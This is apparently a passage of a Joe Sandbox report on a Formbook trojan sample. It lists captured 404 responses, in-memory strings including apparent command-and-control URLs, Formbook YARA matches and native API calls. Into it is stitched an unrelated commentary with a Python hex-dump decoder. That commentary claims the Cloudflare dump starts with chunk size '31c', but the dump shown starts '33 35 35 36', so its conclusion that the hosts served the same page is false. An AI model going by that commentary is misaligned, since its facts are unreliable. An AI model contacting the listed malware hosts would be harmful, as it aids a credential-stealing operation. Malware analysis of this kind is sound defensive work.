                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Thu, 25 Jul 2024 14:33:56 GMT
                server: LiteSpeed
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected (two gzip-encoded responses from the same WordPress origin behind Cloudflare; the second, at Date: Thu, 25 Jul 2024 14:34:15 GMT with CF-Ray: 8a8cdea56c341996-EWR, differs from the first only in those two headers and in its Report-To token, and carries the identical body prefix, so headers are listed once with the second response's differing values noted):
                HTTP/1.1 404 Not Found
                Date: Thu, 25 Jul 2024 14:34:13 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                CF-Ray: 8a8cde953aa50f42-EWR
                CF-Cache-Status: DYNAMIC
                Cache-Control: no-cache, must-revalidate, max-age=0
                Content-Encoding: gzip
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Link: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"
                Vary: Accept-Encoding
                ki-cache-type: None
                Ki-CF-Cache-Status: BYPASS
                ki-edge: v=20.2.8;mv=3.0.9
                ki-origin: g1p
                X-Content-Type-Options: nosniff
                X-Edge-Location-Klb: 1
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGfPbDcNpTgU%2BJAJNRp9AKajRAavhgeiMCx274CqiBm8zcIVEYTVULikm9B2pGPgr6WC5CXTC%2Be2B6mKTNIuq2ThXemTJO7Comflrkov1Mg2Ie0BuMHIbE8QWNmUALr3pMEKdCEPrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                alt-svc: h3=":443"; ma=86400
                Second response, differing headers only: Date: Thu, 25 Jul 2024 14:34:15 GMT; CF-Ray: 8a8cdea56c341996-EWR; Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bug7ducbxjEKR7hyDY6Y571Sy2q5t0kx5h05aqDV1s87rWENSFiqrT4P7MNW4miCrMO8YkPdvODR88BKaqKbDOFNTuSd6PcOQi1qgL0sBaZ%2FSsdGYLlUVlRYHyVsM%2BaMKbVMScpxhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                Data Raw (identical in both responses; the dump is truncated, and bytes 1f 8b 08 after the chunk-size line are the gzip header): 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd e9 9a db 38 92 28 fa db fe be fb 0e 34 cb 95 92 3a 49 a6 a4 5c 6c 4b 96 7d 5c 2e 57 b7 67 bc d4 f5 d2 7d 7a 9c fe 74 28 91 52 d2 a6 44 35 49 65 3a 5b d6 7d 8d fb 40 f7 c5 6e 2c 00 08 6e 5a 32 5d 3d 33 df 39 b5 a4 48 20 10 08 04 02 81 88 00 08 3c be e7 45 e3 f4 7a e1 1b 17 e9 2c 7c 72 f7 31 fe 18 a1 3b 9f 0e 4c 7f 6e 7f 7c 6f 62 9a ef 7a 4f ee de 79 3c f3 53 d7 18 5f b8 71 e2 a7 03 f3 e3 87 df ec 87 a6 4a 9f bb 33 7f 60 5e 06 fe d5 22 8a 53 d3 18 47 f3 d4 9f 03 dc 55 e0 a5 17 03 cf bf 0c c6 be 4d 2f 96 11 cc 83 34 70 43 3b 19 bb a1 3f e8 10 96 30 98 7f 35 62 3f 1c 98 8b 38 9a 04 a1 6f 1a 17 b1 3f 19 98 17 69 ba 48 7a 47 47 d3 d9 62 ea 44 f1 f4 e8 db 64 7e d4 e1 42 69 90 86 fe 93 df dd a9 6f cc a3 d4 98 44 cb b9 67 1c fc f4 b0 db e9 f4 8d 3f 47 91 67 bc f1 83 e9 c5 28 8a 8d e7 e1 72 f4 f8
                Data Ascii (compressed bytes rendered as text, not meaningful): 35568(4:I\lK}\.Wg}zt(RD5Ie:[}@n,nZ2]=39H <Ez,|r1;Ln|obzOy<S_qJ3`^"SGUM/4pC;?05b?8o?iHzGGbDd~BioDg?Gg(r
            Source: global traffic | HTTP traffic detected (the same 551-byte Apache response was recorded three times, with Date: Thu, 25 Jul 2024 14:34:24 GMT, 14:34:27 GMT and 14:34:27 GMT; headers and body are identical across all three and shown once):
                HTTP/1.1 404 Not Found
                Date: Thu, 25 Jul 2024 14:34:24 GMT
                Server: Apache
                Content-Length: 551
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
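The HTTP entries above are shown the way the sandbox captured them: a hex "Data Raw" dump of the response body, truncated after a few hundred bytes, next to a lossy "Data Ascii" rendering. Two details are easy to miss when reading them by eye. The chunked Cloudflare response starts with the chunk-size line 31c, which is hex for 796, the same Content-Length the LiteSpeed hosts announce, so the front-ended host and the direct hosts served the same 404 page. And the two goodneighbor.club responses are gzip-encoded (Content-Encoding: gzip, body starting 1f 8b 08), so their "Data Ascii" is meaningless and the HTML has to be inflated from the hex. The following helper does that decoding. It is an added example, not Joe Sandbox code and not part of this report; REPORT_CHUNKED_PREFIX is the first 20 bytes copied from the Cloudflare dump above, and the gzip sample is constructed in the block because the report's own gzip dumps are cut too short to recover the page.

```python
"""Decode the "Data Raw" hex dumps Joe Sandbox attaches to HTTP traffic entries.

Added example, not Joe Sandbox code and not part of the report. It strips the
chunk-size line of a chunked body, inflates a gzip body even when the dump is
truncated, and pulls out the <title>. The gzip sample below is constructed
here; only REPORT_CHUNKED_PREFIX is copied from the report.
"""
import gzip
import re
import zlib

# Chunk-size line: hex length, optional ;extensions, CRLF (RFC 9112 section 7.1).
CHUNK_HDR = re.compile(rb"^([0-9A-Fa-f]+)(?:;[^\r\n]*)?\r\n")
TITLE = re.compile(rb"<title>\s*(.*?)\s*</title>", re.S)
GZIP_MAGIC = b"\x1f\x8b"


def hex_dump_to_bytes(dump: str) -> bytes:
    """'33 31 63 0d 0a ...' -> b'31c\\r\\n...' (whitespace-separated hex pairs)."""
    return bytes.fromhex("".join(dump.split()))


def strip_chunk_header(data: bytes):
    """Return (declared chunk size or None, payload).

    Heuristic for when the headers are not at hand: a body whose first line is
    plain hex digits plus CRLF is taken to be chunked. Pass chunked=False to
    recover_body() when the headers say Content-Length instead.
    """
    m = CHUNK_HDR.match(data)
    if not m:
        return None, data
    return int(m.group(1), 16), data[m.end():]


def inflate_partial(data: bytes) -> bytes:
    """Inflate a gzip stream; a truncated dump yields whatever prefix decodes."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)  # +16: gzip wrapper, not raw zlib
    try:
        return d.decompress(data)
    except zlib.error:  # corrupt input (merely short input does not raise)
        return b""


def recover_body(dump: str, chunked=None) -> dict:
    """Decode one Data Raw dump; chunked=None auto-detects the chunk-size line."""
    raw = hex_dump_to_bytes(dump)
    chunk_size, payload = (None, raw) if chunked is False else strip_chunk_header(raw)
    is_gzip = payload.startswith(GZIP_MAGIC)
    body = inflate_partial(payload) if is_gzip else payload
    m = TITLE.search(body)
    return {
        "chunked": chunk_size is not None,
        "chunk_size": chunk_size,
        "gzip": is_gzip,
        "body": body,
        "title": m.group(1).decode("utf-8", "replace") if m else None,
    }


# First 20 bytes of the chunked Cloudflare response in the report: "31c\r\n<!DOCTYPE html>".
REPORT_CHUNKED_PREFIX = "33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e"

# Constructed stand-in for the gzip-encoded goodneighbor.club responses, whose
# dumps in the report stop after a few hundred bytes: compress a small page,
# prepend a correct chunk-size line, and also cut the stream to two thirds.
SAMPLE_HTML = (b"<!DOCTYPE html><html><head><title>404 Not Found</title></head>"
               b"<body><p>The resource requested could not be found.</p></body></html>")
SAMPLE_GZ = gzip.compress(SAMPLE_HTML, mtime=0)
CHUNK_LINE = f"{len(SAMPLE_GZ):x}\r\n".encode()
SAMPLE_DUMP_FULL = (CHUNK_LINE + SAMPLE_GZ).hex(" ")
SAMPLE_DUMP_CUT = (CHUNK_LINE + SAMPLE_GZ[: len(SAMPLE_GZ) * 2 // 3]).hex(" ")

if __name__ == "__main__":
    for name, dump in (("report prefix", REPORT_CHUNKED_PREFIX),
                       ("gzip, complete", SAMPLE_DUMP_FULL),
                       ("gzip, truncated", SAMPLE_DUMP_CUT)):
        r = recover_body(dump)
        print(f"{name:16} chunk={r['chunk_size']} gzip={r['gzip']} "
              f"title={r['title']!r} body_bytes={len(r['body'])}")
```

When the headers are available, gate the chunk-size stripping on Transfer-Encoding: chunked rather than on the heuristic, since an uncompressed body that happens to begin with hex digits and CRLF would be misread. For the truncated gzip dumps in this report the decoder returns only the prefix that the captured bytes allow, which is still enough to recognise the WordPress 404 page that the Link header already points to.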
            Source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: SearchIndexer.exe, 00000011.00000002.2927079100.0000000003F5A000.00000004.10000000.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000002.2926538072.000000000337A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://goodneighbor.club/rk1u/?Srs=F12hDm1e4DcVWImHJ
            Source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1771673685.000000000357C000.00000004.00000800.00020000.00000000.sdmp, snTlRrBza.exe, 00000007.00000002.2007365104.000000000328E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: qRurKwDVhn.exe, 00000014.00000002.2925569784.000000000261B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lomos.top
            Source: qRurKwDVhn.exe, 00000014.00000002.2925569784.000000000261B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.lomos.top/pnxn/
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: SearchIndexer.exe, 00000011.00000003.2460891100.0000000007B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara match, File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.JeouiaPf03mHSBH.exe.63e0000.3.raw.unpack, bg.cs Large array initialization: array initializer size 15924
            Source: 0.2.JeouiaPf03mHSBH.exe.34631c0.0.raw.unpack, bg.cs Large array initialization: array initializer size 15924
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0042BE33 NtClose, 6_2_0042BE33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522B60 NtClose, LdrInitializeThunk, 6_2_01522B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522DF0 NtQuerySystemInformation, LdrInitializeThunk, 6_2_01522DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01522C70 NtFreeVirtualMemory, LdrInitializeThunk, 6_2_01522C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015235C0 NtCreateMutant, LdrInitializeThunk, 6_2_015235C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01524340 NtSetContextThread, 6_2_01524340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01524650 NtSuspendThread, 6_2_01524650
